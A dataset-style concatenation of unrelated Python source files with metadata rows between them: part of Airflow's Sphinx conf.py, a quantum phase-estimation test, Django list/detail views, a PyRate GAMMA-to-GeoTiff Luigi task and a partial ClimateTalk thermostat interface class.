'vertica_python',
'winrm',
'zdesk',
]
# Hack to allow changing for piece of the code to behave differently while
# the docs are being built. The main objective was to alter the
# behavior of the utils.apply_default that was hiding function headers
os.environ['BUILDING_AIRFLOW_DOCS'] = 'TRUE'
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), 'exts'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.graphviz',
'sphinxarg.ext',
'sphinxcontrib.httpdomain',
'sphinxcontrib.jinja',
'sphinx.ext.intersphinx',
'autoapi.extension',
'exampleinclude',
'docroles',
'removemarktransform',
'sphinx_copybutton',
]
autodoc_default_options = {
'show-inheritance': True,
'members': True
}
jinja_contexts = {
'config_ctx': {"configs": default_config_yaml()}
}
viewcode_follow_imported_members = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Airflow'
# copyright = u''
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
version = airflow.__version__
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
release = airflow.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
'_api/airflow/api',
'_api/airflow/bin',
'_api/airflow/config_templates',
'_api/airflow/configuration',
'_api/airflow/contrib/auth',
'_api/airflow/contrib/example_dags',
'_api/airflow/contrib/index.rst',
'_api/airflow/contrib/kubernetes',
'_api/airflow/contrib/task_runner',
'_api/airflow/contrib/utils',
'_api/airflow/dag',
'_api/airflow/default_login',
'_api/airflow/example_dags',
'_api/airflow/index.rst',
'_api/airflow/jobs',
'_api/airflow/kubernetes_deprecated',
'_api/airflow/lineage',
'_api/airflow/logging_config',
'_api/airflow/macros',
'_api/airflow/migrations',
'_api/airflow/plugins_manager',
'_api/airflow/security',
'_api/airflow/serialization',
'_api/airflow/settings',
'_api/airflow/sentry',
'_api/airflow/stats',
'_api/airflow/task',
'_api/airflow/typing_compat',
'_api/airflow/kubernetes',
'_api/airflow/ti_deps',
'_api/airflow/upgrade',
'_api/airflow/utils',
'_api/airflow/version',
'_api/airflow/www',
'_api/airflow/www_rbac',
'_api/kubernetes_executor',
'_api/main',
'_api/mesos_executor',
'autoapi_templates',
'howto/operator/gcp/_partials',
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = True
intersphinx_mapping = {
'boto3': ('https://boto3.amazonaws.com/v1/documentation/api/latest/', None),
'mongodb': ('https://api.mongodb.com/python/current/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'python': ('https://docs.python.org/3/', None),
'requests': ('https://requests.readthedocs.io/en/master/', None),
'sqlalchemy': ('https://docs.sqlalchemy.org/en/latest/', None),
'hdfs': ('https://hdfscli.readthedocs.io/en/latest/', None),
# google-cloud-python
'google-cloud-automl': ('https://googleapis.dev/python/automl/latest', None),
'google-cloud-bigquery': ('https://googleapis.dev/python/bigquery/latest', None),
'google-cloud-bigquery-datatransfer': ('https://googleapis.dev/python/bigquerydatatransfer/latest', None),
'google-cloud-bigquery-storage': ('https://googleapis.dev/python/bigquerystorage/latest', None),
'google-cloud-bigtable': ('https://googleapis.dev/python/bigtable/latest', None),
'google-cloud-container': ('https://googleapis.dev/python/container/latest', None),
'google-cloud-core': ('https://googleapis.dev/python/google-cloud-core/latest', None),
'google-cloud-datastore': ('https://googleapis.dev/python/datastore/latest', None),
'google-cloud-dlp': ('https://googleapis.dev/python/dlp/latest', None),
'google-cloud-kms': ('https://googleapis.dev/python/cloudkms/latest', None),
'google-cloud-language': ('https://googleapis.dev/python/language/latest', None),
'google-cloud-pubsub': ('https://googleapis.dev/python/pubsub/latest', None),
'google-cloud-redis': ('https://googleapis.dev/python/redis/latest', None),
'google-cloud-spanner': ('https://googleapis.dev/python/spanner/latest', None),
'google-cloud-speech': ('https://googleapis.dev/python/speech/latest', None),
'google-cloud-storage': ('https://googleapis.dev/python/storage/latest', None),
'google-cloud-tasks': ('https://googleapis.dev/python/cloudtasks/latest', None),
'google-cloud-texttospeech': ('https://googleapis.dev/python/texttospeech/latest', None),
'google-cloud-translate': ('https://googleapis.dev/python/translation/latest', None),
'google-cloud-videointelligence': ('https://googleapis.dev/python/videointelligence/latest', None),
'google-cloud-vision': ('https://googleapis.dev/python/vision/latest', None),
}
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
if airflow_theme_is_available:
html_theme = 'sphinx_airflow_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
import sphinx_rtd_theme # pylint: disable=wrong-import-position,wrong-import-order
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Airflow Documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = ""
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
html_favicon = "../airflow/www/static/pin_32.png"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# A list of JavaScript filename. The entry must be a filename string or a
# tuple containing the filename string and the attributes dictionary. The
# filename must be relative to the html_static_path, or a full URI with
# scheme like http://example.org/script.js.
html_js_files = ['jira-links.js']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
if airflow_theme_is_available:
html_sidebars = {
'**': [
'version-selector.html',
'searchbox.html',
'globaltoc.html',
]
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Airflowdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
} # type: Dict[str,str]
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Airflow.tex', u'Airflow Documentation',
u'Apache Airflow', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'airflow', u'Airflow Documentation',
[u'Apache Airflow'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [(
'index', 'Airflow', u'Airflow Documentation',
u'Apache Airflow', 'Airflow',
'Airflow is a system to programmatically author, schedule and monitor data pipelines.',
'Miscellaneous'
), ]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# sphinx-autoapi configuration
# See:
# https://sphinx-autoapi.readthedocs.io/en/latest/config.html
# Paths (relative or absolute) to the source code that you wish to generate
# your API documentation from.
autoapi_dirs = [
os.path.abspath('../airflow'),
]
# A directory that has user-defined templates to override our default templates.
autoapi_template_dir = 'autoapi_templates'
# A list of patterns to ignore when finding files
autoapi_ignore = [
# These modules are backcompat shims, don't build docs for them
'*/airflow/contrib/operators/s3_to_gcs_transfer_operator.py',
'*/airflow/contrib/operators/gcs_to_gcs_transfer_operator.py',
'*/airflow/contrib/operators/gcs_to_gcs_transfer_operator.py',
'*/airflow/kubernetes/kubernetes_request_factory/*',
'*/node_modules/*',
'*/migrations/*',
]
# Keep the AutoAPI generated files on the filesystem after the run.
# Useful for debugging.
autoapi_keep_files = True
# Relative path to output the AutoAPI files into. This can also be used to place the generated documentation
# anywhere in your documentation hierarchy.
autoapi_root = '_api'
# -- Options for examole include ------------------------------------------
exampleinclude_sourceroot = os.path.abspath('..')
# -- Additional HTML Context variable
html_context = {
# Google Analytics ID.
# For more information look at:
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/layout.html#L222-L232
'theme_analytics_id': 'UA-140539454-1',
}
if airflow_theme_is_available:
html_context = {
# Variables used to build a button for editing the source code
#
# The path is created according to the following template:
#
# https://{{ github_host|default("github.com") }}/{{ github_user }}/{{ github_repo }}/
# {{ theme_vcs_pageview_mode|default("blob") }}/{{ github_version }}{{ conf_py_path }}
# {{ pagename }}{{ suffix }}
#
# More information:
# https://github.com/readthedocs/readthedocs.org/blob/master/readthedocs/doc_builder/templates/doc_builder/conf.py.tmpl#L100-L103
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/breadcrumbs.html#L45
# https://github.com/apache/airflow-site/blob/91f760c/sphinx_airflow_theme/sphinx_airflow_theme/suggest_change_button.html#L36-L40
#
'theme_vcs_pageview_mode': 'edit',
'conf_py_path': '/docs/',
'github_user': 'apache',
'github_repo': 'airflow',
'github_version': 'master',
'display_github': 'master',
'suffix': '.rst',
}
html_theme_options = {
'hide_website_buttons': False,
'navbar_links': [
{'href': '/community/', 'text': 'Community'},
{'href': '/meetups/', 'text': 'Meetups'},
{'href': '/docs/', 'text': 'Documentation'},
{'href': '/use-cases/', 'text': 'Use-cases'},
{'href': '/announcements/', 'text': 'Announcements'},
{'href': '/blog/', 'text': 'Blog'},
{'href': '/ecosystem/', 'text': 'Ecosystem'},
]
}
| 33.880734 | 138 | 0.692066 |
b91e8eb1e974a71c93850c211acb4b2d2e946504 | 1,056 | py | Python | grove/tests/phaseestimation/test_phaseestimation.py | msohaibalam/grove | 8c27a5d12923d6ace57956db6a249e8d01e33f35 | [
"Apache-2.0"
] | 1 | 2020-07-15T15:40:49.000Z | 2020-07-15T15:40:49.000Z | grove/tests/phaseestimation/test_phaseestimation.py | msohaibalam/grove | 8c27a5d12923d6ace57956db6a249e8d01e33f35 | [
"Apache-2.0"
] | null | null | null | grove/tests/phaseestimation/test_phaseestimation.py | msohaibalam/grove | 8c27a5d12923d6ace57956db6a249e8d01e33f35 | [
"Apache-2.0"
] | 1 | 2021-11-27T16:20:00.000Z | 2021-11-27T16:20:00.000Z | import numpy as np
from pyquil.gates import H, CPHASE, SWAP, MEASURE
import pyquil.quil as pq
from grove.qft.fourier import inverse_qft
from grove.alpha.phaseestimation.phase_estimation import controlled
from grove.alpha.phaseestimation.phase_estimation import phase_estimation
def test_phase_estimation():
phase = 0.75
precision = 4
phase_factor = np.exp(1.0j * 2 * np.pi * phase)
U = np.array([[phase_factor, 0],
[0, -1*phase_factor]])
trial_prog = phase_estimation(U, precision)
result_prog = pq.Program([H(i) for i in range(precision)])
q_out = range(precision, precision+1)
for i in range(precision):
if i > 0:
U = np.dot(U, U)
cU = controlled(U)
name = "CONTROLLED-U{0}".format(2 ** i)
result_prog.defgate(name, cU)
result_prog.inst((name, i) + tuple(q_out))
result_prog += inverse_qft(range(precision))
result_prog += [MEASURE(i, [i]) for i in range(precision)]
assert(trial_prog == result_prog)
| 28.540541 | 73 | 0.642045 |
a0421ba1db4b3e7f8fef11ee361550e414c51461 | 620 | py | Python | hn_clone/posts/views.py | bkavanagh/dj-hackernews-clone | 543d2774c2b956dd6aadd81a4f51c3df6c3e9060 | [
"MIT"
] | null | null | null | hn_clone/posts/views.py | bkavanagh/dj-hackernews-clone | 543d2774c2b956dd6aadd81a4f51c3df6c3e9060 | [
"MIT"
] | null | null | null | hn_clone/posts/views.py | bkavanagh/dj-hackernews-clone | 543d2774c2b956dd6aadd81a4f51c3df6c3e9060 | [
"MIT"
] | null | null | null | from django.shortcuts import (
render, get_object_or_404,
)
from django.views import generic
from .models import (
Post, Author, Tag
)
class IndexView(generic.ListView):
# model = Post
template_name = 'posts/index.html'
context_object_name = 'posts_list'
def get_queryset(self):
return Post.objects.order_by('-created')
class DetailView(generic.DetailView):
model = Post
template_name = 'posts/detail.html'
context_object_name = 'post'
def get_object(self, queryset=None, id=1):
return get_object_or_404(Post, pk=id)
| 22.962963 | 48 | 0.653226 |
2c6dd49259763070f73dde8c3b8bb67174433f99 | 4,131 | py | Python | pyrate/tasks/gamma.py | jlmaurer/PyRate | bf1a3d916f1c83e7a0dda3ecc15858f8f1e4ee84 | [
"Apache-2.0"
] | 1 | 2018-11-01T04:45:19.000Z | 2018-11-01T04:45:19.000Z | pyrate/tasks/gamma.py | bingo456/PyRate | bf1a3d916f1c83e7a0dda3ecc15858f8f1e4ee84 | [
"Apache-2.0"
] | null | null | null | pyrate/tasks/gamma.py | bingo456/PyRate | bf1a3d916f1c83e7a0dda3ecc15858f8f1e4ee84 | [
"Apache-2.0"
] | 1 | 2020-12-31T00:34:35.000Z | 2020-12-31T00:34:35.000Z | # This Python module is part of the PyRate software package.
#
# Copyright 2017 Geoscience Australia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This Python module is a Luigi wrapper for converting GAMMA format input data.
"""
# pylint: disable=attribute-defined-outside-init
import os
from os.path import join
import re
import glob2
import luigi
from pyrate import config
from pyrate.gamma import manage_headers
from pyrate.shared import write_geotiff, output_tiff_filename
from pyrate.tasks.utils import IfgListMixin, InputParam
PTN = re.compile(r'\d{8}') # match 8 digits for the dates
class GammaHasRun(luigi.task.ExternalTask):
"""
Phantom task used to ensure that the required outputs from GAMMA exist.
"""
fileName = luigi.Parameter()
masterHeader = luigi.Parameter(default=None)
slaveHeader = luigi.Parameter(default=None)
def output(self):
targets = [luigi.LocalTarget(self.fileName)]
if self.masterHeader is not None:
targets.append(luigi.LocalTarget(self.masterHeader))
if self.slaveHeader is not None:
targets.append(luigi.LocalTarget(self.slaveHeader))
return targets
def get_header_paths(input_file, slc_dir=None):
"""
Function that matches input GAMMA file names with GAMMA header file names
:param str input_file: input GAMMA .unw file.
:param str slc_dir: GAMMA SLC header file directory
:return: list of matching header files
:rtype: list
"""
if slc_dir:
dir_name = slc_dir
_, file_name = os.path.split(input_file)
else: # header file must exist in the same dir as that of .unw
dir_name, file_name = os.path.split(input_file)
matches = PTN.findall(file_name)
return [glob2.glob(join(dir_name, '**/*%s*slc.par' % m))[0]
for m in matches]
class ConvertFileToGeotiff(luigi.Task):
"""
Task responsible for converting a GAMMA file to GeoTiff.
"""
input_file = luigi.Parameter()
demHeaderFile = luigi.Parameter(
config_path=InputParam(config.DEM_HEADER_FILE))
out_dir = luigi.Parameter(config_path=InputParam(config.OUT_DIR))
no_data_value = luigi.FloatParameter(
config_path=InputParam(config.NO_DATA_VALUE))
slc_dir = luigi.Parameter(config_path=InputParam(config.SLC_DIR))
def requires(self):
"""
Overload of :py:meth:`luigi.Task.requires`. Ensures that the required
input exists.
"""
self.header_paths = get_header_paths(self.input_file, self.slc_dir)
if len(self.header_paths) == 2:
tasks = [GammaHasRun(
fileName=self.input_file,
masterHeader=self.header_paths[0],
slaveHeader=self.header_paths[1])]
else:
tasks = [GammaHasRun(fileName=self.input_file)]
return tasks
def output(self):
"""
Overload of :py:meth:`luigi.Task.output`.
"""
self.out_file = output_tiff_filename(self.input_file, self.out_dir)
return [luigi.LocalTarget(self.out_file)]
def run(self):
"""
Overload of :py:meth:`luigi.Task.run`.
"""
combined_header = manage_headers(self.demHeaderFile, self.header_paths)
write_geotiff(combined_header, self.input_file,
self.out_file, self.no_data_value)
class ConvertToGeotiff(IfgListMixin, luigi.WrapperTask):
""" Wrapper class for GAMMA conversion to geotiff"""
def requires(self):
return [ConvertFileToGeotiff(input_file=fn)
for fn in self.ifg_list(tif=False)]
| 34.425 | 79 | 0.682885 |
76e8628625ed6f460e7592a885d8361499c06016 | 33,421 | py | Python | climatetalk/mdi/thermostat.py | kdschlosser/ClimateTalk | 3b09a45c295cf5228283d7095834e8f133ed7de3 | [
"MIT"
] | 3 | 2021-04-30T20:12:16.000Z | 2022-03-09T11:53:12.000Z | climatetalk/mdi/thermostat.py | kdschlosser/ClimateTalk | 3b09a45c295cf5228283d7095834e8f133ed7de3 | [
"MIT"
] | null | null | null | climatetalk/mdi/thermostat.py | kdschlosser/ClimateTalk | 3b09a45c295cf5228283d7095834e8f133ed7de3 | [
"MIT"
] | 2 | 2021-04-08T18:29:39.000Z | 2021-04-30T20:13:55.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Kevin Schlosser
import datetime
import threading
from ..utils import (
get_bit as _get_bit,
set_bit as _set_bit,
TwosCompliment
)
from ..packet import (
GetConfigurationRequest,
GetStatusRequest
)
from ..commands import (
SystemSwitchModify,
HeatSetPointTemperatureModify,
CoolSetPointTemperatureModify,
PermanentSetPointTempHoldModify,
HoldOverride,
RealTimeDayOverride,
HeatProfileChange,
CoolProfileChange,
FanKeySelection,
SubsystemInstallationTest,
BeeperEnable,
FahrenheitCelsiusDisplay,
ComfortRecoveryModify,
ChangeFilterTimeRemaining,
VacationMode,
TempDisplayAdjFactorChange,
CompressorLockout,
CustomMessageAreaDisplayData,
SetPointTempAndTemporaryHold,
ContinuousDisplayLight,
AdvanceRealTimeDayOverride,
KeypadLockout,
SetPointTempTimeHold,
ComfortModeModification,
LimitedHeatAndCoolRange,
ChangeUvLightMaintenanceTimer,
ChangeHumidifierPadMaintTimerall,
RestoreFactoryDefaults,
# ReversingValveConfig,
# HumDehumConfig,
HeatDemand,
AuxHeatDemand,
BackUpHeatDemand,
FanDemand,
CoolDemand,
DehumidificationDemand,
HumidificationDemand,
HumidificationSetPointModify,
DehumidificationSetPointModify,
CommunicationsReceiverOnOff,
ForcePhoneNumberDisplay,
FAN_DEMAND_MANUAL as _FAN_DEMAND_MANUAL,
FAN_DEMAND_COOL as _FAN_DEMAND_COOL,
FAN_DEMAND_HEAT as _FAN_DEMAND_HEAT,
FAN_DEMAND_AUX_HEAT as _FAN_DEMAND_AUX_HEAT,
FAN_DEMAND_EMERGENCY_HEAT as _FAN_DEMAND_EMERGENCY_HEAT,
FAN_DEMAND_DEFROST as _FAN_DEMAND_DEFROST
)
THERMOSTAT_SYSTEM_TYPE_UNKNOWN = 0x00
THERMOSTAT_SYSTEM_TYPE_CONVENTIONAL = 0x01
THERMOSTAT_SYSTEM_TYPE_HEAT_PUMP = 0x02
THERMOSTAT_SYSTEM_TYPE_DUAL_FUEL = 0x03
THERMOSTAT_SYSTEM_TYPE_COOLING = 0x04
THERMOSTAT_SYSTEM_TYPE_GAS_HEAT = 0x05
THERMOSTAT_SYSTEM_TYPE_ELECTRIC_HEAT = 0x06
THERMOSTAT_SYSTEM_TYPE_ELECTRIC_ONLY = 0x07
THERMOSTAT_SYSTEM_TYPE_FAN_ONLY = 0x08
THERMOSTAT_SYSTEM_TYPE_GEOTHERMAL_HEAT_PUMP = 0x09
THERMOSTAT_SYSTEM_TYPE_GEOTHERMAL_DUAL_FUEL = 0x0A
THERMOSTAT_SYSTEM_TYPE_BOILER = 0x0B
THERMOSTAT_SYSTEM_TYPE_BOILER_HEAT_PUMP = 0x0C
THERMOSTAT_SYSTEM_TYPE_UNUSED = 0x7F
THERMOSTAT_SYSTEM_TYPE_OTHER = 0xFF
THERMOSTAT_ENABLED = 0x01
THERMOSTAT_DISABLED = 0x00
THERMOSTAT_CAPABLE = 0x01
THERMOSTAT_NOT_CAPABLE = 0x00
THERMOSTAT_SCALE_FAHRENHEIT = 0x01
THERMOSTAT_SCALE_CELSIUS = 0x00
THERMOSTAT_CYCLE_RATE_FAST = 0xFF
THERMOSTAT_CYCLE_RATE_SLOW = 0xFE
THERMOSTAT_SENSOR_WEIGHT_DEFAULT = 0x00
THERMOSTAT_SENSOR_WEIGHT_LOW = 0x01
THERMOSTAT_SENSOR_WEIGHT_MEDIUM = 0x02
THERMOSTAT_SENSOR_WEIGHT_HIGH = 0x03
THERMOSTAT_TYPE_COMMERCIAL = 0x01
THERMOSTAT_TYPE_RESIDENTIAL = 0x00
THERMOSTAT_PROFILE_TYPE_NON_PROGRAMMABLE = 0x00
THERMOSTAT_PROFILE_TYPE_7_DAY = 0x01
THERMOSTAT_PROFILE_TYPE_5_1_1 = 0x02
THERMOSTAT_PROFILE_TYPE_5_2 = 0x03
THERMOSTAT_INTERVAL_TYPE_NON_PROGRMMABLE = 0x00
THERMOSTAT_INTERVAL_TYPE_2_STEP = 0x01
THERMOSTAT_INTERVAL_TYPE_4_STEP = 0x02
THERMOSTAT_KEYPAD_LOCKOUT_OFF = 0x00
THERMOSTAT_KEYPAD_LOCKOUT_PARTIAL = 0x01
THERMOSTAT_KEYPAD_LOCKOUT_FULL = 0x02
THERMOSTAT_SYSTEM_STATUS_OFF = 0x00
THERMOSTAT_SYSTEM_STATUS_COOL = 0x01
THERMOSTAT_SYSTEM_STATUS_AUTO_COOL = 0x02
THERMOSTAT_SYSTEM_STATUS_HEAT = 0x03
THERMOSTAT_SYSTEM_STATUS_AUTO_HEAT = 0x04
THERMOSTAT_SYSTEM_STATUS_BACKUP = 0x05
THERMOSTAT_CURTAILMENT_STATUS_NONE = 0x00
THERMOSTAT_CURTAILMENT_STATUS_DLC = 0x01
THERMOSTAT_CURTAILMENT_STATUS_TIERED = 0x02
THERMOSTAT_CURTAILMENT_STATUS_RTP_PROTECTION = 0x03
THERMOSTAT_CURTAILMENT_STATUS_RTP = 0x04
THERMOSTAT_FAN_STATUS_AUTO = 0x00
THERMOSTAT_FAN_STATUS_ALWAYS_ON = 0x01
THERMOSTAT_FAN_STATUS_OCCUPIED_ON = 0x02
class ThermostatMDI(object):
def __init__(self, network, address, subnet, mac_address, session_id):
self.network = network
self.address = address
self.subnet = subnet
self.mac_address = mac_address
self.session_id = session_id
def _send(self, packet):
"""
:type packet: .. py:class:: climatetalk.packet.Packet
:return:
"""
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
self.network.send(packet)
def _get_status_mdi(self, byte_num, num_bytes):
num_bytes += 1
packet = GetStatusRequest()
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
event = threading.Event()
data = bytearray()
def callback(response):
data.extend(
response.payload_data[byte_num:byte_num + num_bytes]
)
GetConfigurationRequest.message_type.disconnect(
self.address,
self.subnet
)
event.set()
GetConfigurationRequest.message_type.connect(
self.address,
self.subnet,
callback
)
self.network.send(packet)
event.wait()
return data
def _get_mdi(self, byte_num, num_bytes):
num_bytes += 1
packet = GetConfigurationRequest()
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
event = threading.Event()
data = bytearray()
def callback(response):
data.extend(
response.payload_data[byte_num:byte_num + num_bytes]
)
GetConfigurationRequest.message_type.disconnect(
self.address,
self.subnet
)
event.set()
GetConfigurationRequest.message_type.connect(
self.address,
self.subnet,
callback
)
self.network.send(packet)
event.wait()
return data
@property
def system_type(self):
"""
:return: one of THERMOSTAT_SYSTEM_TYPE_* constants
"""
data = self._get_mdi(0, 0)
return data[0]
@property
def heat_stages(self):
"""
:return: number of stages, 15 = Variable/Modulating
"""
data = self._get_mdi(1, 0)
return data[0] >> 4
@property
def cool_stages(self):
"""
:return: number of stages, 15 = Variable/Modulating
"""
data = self._get_mdi(1, 0)
return data[0] & 0xF
@property
def balance_point_set_temp(self):
"""
:return:
0x00 = Balance Point System is off
0xFF = Default value indicating that this is not being used
0x01 - 0x7F =
"""
data = self._get_mdi(2, 0)
return data[0]
@property
def filter_time(self):
"""
:return: hours
"""
data = self._get_mdi(3, 1)
return data[0] << 8 | data[1]
@filter_time.setter
def filter_time(self, value):
packet = ChangeFilterTimeRemaining()
if value is True:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
else:
return
self._send(packet)
@property
def temp_adjustment_offset(self):
data = self._get_mdi(5, 0)
return TwosCompliment.decode(data[0], 8)
@temp_adjustment_offset.setter
def temp_adjustment_offset(self, value):
packet = TempDisplayAdjFactorChange()
packet.set_command_data(value)
self._send(packet)
@property
def programmable_hold_time(self):
"""
:return:
0x00 = disabled
0xFFFF = default value
"""
data = self._get_mdi(6, 1)
return data[0] << 8 | data[1]
@property
def max_temp(self):
"""
:return: 0xFF = not set/default
"""
data = self._get_mdi(8, 0)
return data[0]
@max_temp.setter
def max_temp(self, value):
packet = LimitedHeatAndCoolRange()
packet.set_command_data(self.min_temp, value)
self._send(packet)
@property
def min_temp(self):
"""
:return: 0xFF = not set/default
"""
data = self._get_mdi(9, 0)
return data[0]
@min_temp.setter
def min_temp(self, value):
packet = LimitedHeatAndCoolRange()
packet.set_command_data(value, self.max_temp)
self._send(packet)
@property
def emr_state(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 0))
@emr_state.setter
def emr_state(self, value):
packet = ComfortRecoveryModify()
data = self._get_mdi(10, 0)
packet.set_command_data(_get_bit(data[0], 7), value)
self._send(packet)
@property
def keypad_lockout(self):
"""
:return: one of THERMOSTAT_KEYPAD_LOCKOUT_* constants
"""
data = self._get_mdi(10, 0)
if _get_bit(data[0], 6):
data = self._get_mdi(22, 0)
if _get_bit(data[0], 2):
return THERMOSTAT_KEYPAD_LOCKOUT_PARTIAL
elif _get_bit(data[0], 1):
return THERMOSTAT_KEYPAD_LOCKOUT_FULL
return THERMOSTAT_KEYPAD_LOCKOUT_OFF
def set_keypad_lockout(self, lockout_type, password):
packet = KeypadLockout()
packet.set_command_data(lockout_type, password)
self._send(packet)
@property
def scale(self):
"""
:return: one of THERMOSTAT_SCALE_* constants
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 5))
@scale.setter
def scale(self, value):
packet = FahrenheitCelsiusDisplay()
packet.set_command_data(value)
self._send(packet)
@property
def fast_second_stage(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 4))
@fast_second_stage.setter
def fast_second_stage(self, value):
packet = ComfortModeModification()
packet.set_command_data(value)
self._send(packet)
@property
def continious_display_light(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 3))
@continious_display_light.setter
def continious_display_light(self, value):
packet = ContinuousDisplayLight()
packet.set_command_data(value)
self._send(packet)
@property
def compressor_lockout(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 2))
@compressor_lockout.setter
def compressor_lockout(self, value):
packet = CompressorLockout()
packet.set_command_data(value)
self._send(packet)
@property
def heat_cycle_rate(self):
"""
:return: % or one of THERMOSTAT_CYCLE_RATE_* constants
"""
data = self._get_mdi(20, 0)
if data[0]:
return float(data[0]) * 0.5
data = self._get_mdi(10, 0)
